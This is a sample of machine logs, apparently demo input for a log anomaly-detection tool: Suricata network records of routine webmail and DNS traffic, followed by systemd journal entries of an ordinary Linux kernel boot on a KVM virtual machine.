{"timestamp":"2020-02-29T00:27:35.523857+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/attachment.png","state":"CLOSED","stored":false,"size":545,"tx_id":12}} {"timestamp":"2020-02-29T00:27:35.714780+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete-small.png","state":"CLOSED","stored":false,"size":124,"tx_id":14}} {"timestamp":"2020-02-29T00:27:36.344575+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38284,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:36.452597+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38284,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:27:36.452597+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38284,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:36.475284+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38285,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:27:36.583643+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38285,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:36.583643+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38285,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:27:37.000318+0000","event_type":"stats","stats":{"uptime":15309,"capture":{"kernel_packets":143203,"kernel_drops":0},"decoder":{"pkts":143205,"bytes":98434268,"invalid":196,"ipv4":141600,"ipv6":10,"ethernet":143205,"raw":0,"null":0,"sll":0,"tcp":135993,"udp":5396,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089280},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2936,"ssn_memcap_drop":0,"pseudo":357,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2952,"synack":2943,"rst":1227,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1934,"ftp":0,"smtp":0,"tls":793,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2469,"failed_udp":116},"tx":{"http":5096,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2553}},"flow_mgr":{"closed_pruned":2908,"new_pruned":17,"est_pruned":2557,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10560,"memcap_state":0,"memcap_global":0},"http":{"memuse":880,"memcap":0}}} logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/journal.log000066400000000000000000025216531500476301700320470ustar00rootroot00000000000000{ "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1;b=e2b08827b5804427b422c10c84f1567e;m=5580a6;t=5bd16dd19000e;x=c051adcbd24ec9d9", "__REALTIME_TIMESTAMP" : "1615280779886606", "__MONOTONIC_TIMESTAMP" : "5603494", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "MESSAGE" : "Linux version 4.15.0-60-generic (buildd@lgw01-amd64-030) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #67-Ubuntu SMP Thu Aug 22 16:55:30 UTC 2019 (Ubuntu 4.15.0-60.67-generic 4.15.18)", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2;b=e2b08827b5804427b422c10c84f1567e;m=5580ef;t=5bd16dd190056;x=6625bc488f616068", "__REALTIME_TIMESTAMP" : "1615280779886678", "__MONOTONIC_TIMESTAMP" : "5603567", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-60-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3;b=e2b08827b5804427b422c10c84f1567e;m=5580fc;t=5bd16dd190063;x=b9b11c44043d6efd", "__REALTIME_TIMESTAMP" : "1615280779886691", "__MONOTONIC_TIMESTAMP" : "5603580", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "KERNEL supported cpus:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4;b=e2b08827b5804427b422c10c84f1567e;m=558105;t=5bd16dd19006c;x=73e76d9bac5bf174", "__REALTIME_TIMESTAMP" : "1615280779886700", 
"__MONOTONIC_TIMESTAMP" : "5603589", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Intel GenuineIntel" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5;b=e2b08827b5804427b422c10c84f1567e;m=55810d;t=5bd16dd190075;x=e0fc2ab01305acb9", "__REALTIME_TIMESTAMP" : "1615280779886709", "__MONOTONIC_TIMESTAMP" : "5603597", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " AMD AuthenticAMD" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6;b=e2b08827b5804427b422c10c84f1567e;m=558116;t=5bd16dd19007d;x=2b216ce1cd7e969b", "__REALTIME_TIMESTAMP" : "1615280779886717", "__MONOTONIC_TIMESTAMP" : "5603606", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Centaur CentaurHauls" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7;b=e2b08827b5804427b422c10c84f1567e;m=558123;t=5bd16dd19008b;x=753688cca998c71f", "__REALTIME_TIMESTAMP" : "1615280779886731", "__MONOTONIC_TIMESTAMP" : "5603619", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8;b=e2b08827b5804427b422c10c84f1567e;m=55813c;t=5bd16dd1900a4;x=126a9f347823ed25", "__REALTIME_TIMESTAMP" : "1615280779886756", "__MONOTONIC_TIMESTAMP" : "5603644", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=9;b=e2b08827b5804427b422c10c84f1567e;m=558146;t=5bd16dd1900ae;x=f3457b360b1dc2a1", "__REALTIME_TIMESTAMP" : "1615280779886766", "__MONOTONIC_TIMESTAMP" : "5603654", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=a;b=e2b08827b5804427b422c10c84f1567e;m=558152;t=5bd16dd1900b9;x=5f0007f265216832", "__REALTIME_TIMESTAMP" : "1615280779886777", "__MONOTONIC_TIMESTAMP" : "5603666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=b;b=e2b08827b5804427b422c10c84f1567e;m=55815b;t=5bd16dd1900c3;x=ac0b779e15c3e2e4", "__REALTIME_TIMESTAMP" : "1615280779886787", "__MONOTONIC_TIMESTAMP" : "5603675", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=c;b=e2b08827b5804427b422c10c84f1567e;m=558178;t=5bd16dd1900df;x=83cffa4921471e01", "__REALTIME_TIMESTAMP" : "1615280779886815", "__MONOTONIC_TIMESTAMP" : "5603704", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: BIOS-provided physical RAM map:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=d;b=e2b08827b5804427b422c10c84f1567e;m=558181;t=5bd16dd1900e8;x=3d6809c19f32501", "__REALTIME_TIMESTAMP" : "1615280779886824", "__MONOTONIC_TIMESTAMP" : "5603713", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=e;b=e2b08827b5804427b422c10c84f1567e;m=55818a;t=5bd16dd1900f1;x=86babca894ceac2f", "__REALTIME_TIMESTAMP" : "1615280779886833", "__MONOTONIC_TIMESTAMP" : "5603722", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=f;b=e2b08827b5804427b422c10c84f1567e;m=558196;t=5bd16dd1900fe;x=9b0dc0acf836acae", "__REALTIME_TIMESTAMP" : "1615280779886846", "__MONOTONIC_TIMESTAMP" : "5603734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10;b=e2b08827b5804427b422c10c84f1567e;m=5581a3;t=5bd16dd19010a;x=dc8c8f4c503ce77c", "__REALTIME_TIMESTAMP" : "1615280779886858", "__MONOTONIC_TIMESTAMP" : "5603747", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x0000000000100000-0x000000007ffdbfff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11;b=e2b08827b5804427b422c10c84f1567e;m=5581b5;t=5bd16dd19011c;x=d98108b0778208d0", "__REALTIME_TIMESTAMP" : "1615280779886876", "__MONOTONIC_TIMESTAMP" : "5603765", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x000000007ffdc000-0x000000007fffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12;b=e2b08827b5804427b422c10c84f1567e;m=5581c3;t=5bd16dd19012a;x=243e15a620c43f41", "__REALTIME_TIMESTAMP" : "1615280779886890", "__MONOTONIC_TIMESTAMP" : "5603779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", 
"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000feffc000-0x00000000feffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13;b=e2b08827b5804427b422c10c84f1567e;m=5581cc;t=5bd16dd190134;x=9df9e25b4913d3c5", "__REALTIME_TIMESTAMP" : "1615280779886900", "__MONOTONIC_TIMESTAMP" : "5603788", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14;b=e2b08827b5804427b422c10c84f1567e;m=5581d5;t=5bd16dd19013d;x=36b965c29ff40590", "__REALTIME_TIMESTAMP" : "1615280779886909", "__MONOTONIC_TIMESTAMP" : "5603797", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "NX (Execute Disable) protection: active" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15;b=e2b08827b5804427b422c10c84f1567e;m=5581de;t=5bd16dd190146;x=c6690de411e5df17", "__REALTIME_TIMESTAMP" : "1615280779886918", "__MONOTONIC_TIMESTAMP" : "5603806", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "SMBIOS 2.8 present." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16;b=e2b08827b5804427b422c10c84f1567e;m=5581e7;t=5bd16dd19014f;x=c4fdbca5419d55f3", "__REALTIME_TIMESTAMP" : "1615280779886927", "__MONOTONIC_TIMESTAMP" : "5603815", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "DMI: OpenStack Foundation OpenStack Nova, BIOS 1.10.2-1ubuntu1 04/01/2014" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17;b=e2b08827b5804427b422c10c84f1567e;m=5581f3;t=5bd16dd19015a;x=de982aa3b245a14a", "__REALTIME_TIMESTAMP" : "1615280779886938", "__MONOTONIC_TIMESTAMP" : "5603827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Hypervisor detected: KVM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=18;b=e2b08827b5804427b422c10c84f1567e;m=5581fc;t=5bd16dd190164;x=a542e74c0abd30a6", "__REALTIME_TIMESTAMP" : "1615280779886948", "__MONOTONIC_TIMESTAMP" : "5603836", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "e820: update [mem 0x00000000-0x00000fff] usable ==> reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=19;b=e2b08827b5804427b422c10c84f1567e;m=558205;t=5bd16dd19016d;x=f6828ca424fd1ccb", "__REALTIME_TIMESTAMP" : "1615280779886957", "__MONOTONIC_TIMESTAMP" : "5603845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", 
"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "e820: remove [mem 0x000a0000-0x000fffff] usable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1a;b=e2b08827b5804427b422c10c84f1567e;m=55820f;t=5bd16dd190176;x=1ddef7fd13afc6c9", "__REALTIME_TIMESTAMP" : "1615280779886966", "__MONOTONIC_TIMESTAMP" : "5603855", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: last_pfn = 0x7ffdc max_arch_pfn = 0x400000000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1b;b=e2b08827b5804427b422c10c84f1567e;m=558217;t=5bd16dd19017f;x=b37967a7d5978781", "__REALTIME_TIMESTAMP" : "1615280779886975", "__MONOTONIC_TIMESTAMP" : "5603863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR default type: write-back" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1c;b=e2b08827b5804427b422c10c84f1567e;m=558220;t=5bd16dd190188;x=59ac1a4d33299f29", "__REALTIME_TIMESTAMP" : "1615280779886984", "__MONOTONIC_TIMESTAMP" : "5603872", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR fixed ranges enabled:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1d;b=e2b08827b5804427b422c10c84f1567e;m=558229;t=5bd16dd190191;x=dbfd08ab63661380", "__REALTIME_TIMESTAMP" : "1615280779886993", 
"__MONOTONIC_TIMESTAMP" : "5603881", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " 00000-9FFFF write-back" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e;b=e2b08827b5804427b422c10c84f1567e;m=558232;t=5bd16dd190199;x=8e640bc12038fc0", "__REALTIME_TIMESTAMP" : "1615280779887001", "__MONOTONIC_TIMESTAMP" : "5603890", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " A0000-BFFFF uncachable" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f;b=e2b08827b5804427b422c10c84f1567e;m=55823b;t=5bd16dd1901a2;x=3ba105f65bb369a0", "__REALTIME_TIMESTAMP" : "1615280779887010", "__MONOTONIC_TIMESTAMP" : "5603899", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " C0000-FFFFF write-protect" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20;b=e2b08827b5804427b422c10c84f1567e;m=558244;t=5bd16dd1901ab;x=bf02c2451cebc555", "__REALTIME_TIMESTAMP" : "1615280779887019", "__MONOTONIC_TIMESTAMP" : "5603908", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "MTRR variable ranges enabled:" } { "__CURSOR" : 
